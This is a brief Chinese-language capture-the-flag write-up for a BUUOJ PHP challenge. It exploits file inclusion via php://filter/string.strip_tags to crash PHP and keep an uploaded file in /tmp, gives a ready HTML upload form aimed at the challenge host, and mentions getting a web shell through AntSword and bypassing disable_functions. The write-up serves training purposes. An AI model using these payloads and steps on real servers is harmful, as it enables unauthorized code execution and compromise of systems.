挺有意思的trick
打开页面后只显示了账号密码错误,一头雾水。然后F12发现了提示
扫描了一下发现了几个页面
bp抓包发送cookie中的hash就成了。。。
提示有flflflflag.php,访问一下,很明显有文件包含
老方法逐个读取文件。发现dir.php列出了/tmp的内容
php://filter/string.strip_tags可参考https://www.cnblogs.com/tr1ple/p/11301743.html
通过php://filter/string.strip_tags/resource=/etc/passwd导致php崩溃清空堆栈重启,如果在同时上传了一个文件,那么该文件就会一直留在tmp目录
如果没有dir.php,就需要爆破文件名getshell,这道题算是降低了难度
<html> <head></head> <body> <form id="upload-form" action="http://c2eb6fd2-b700-40ac-8361-c4d62956bca1.node3.buuoj.cn/flflflflag.php?file=php://filter/string.strip_tags/resource=/etc/passwd" method="post" enctype="multipart/form-data" > <input type="file" id="upload" name="upload" /> <br /> <input type="submit" value="Upload" /> </form> </body> </html>
写了个html上传文件
上蚁剑,存在disable_function。上插件
找了半天没找到flag。最后用命令php -i。在phpinfo中找到了flag.......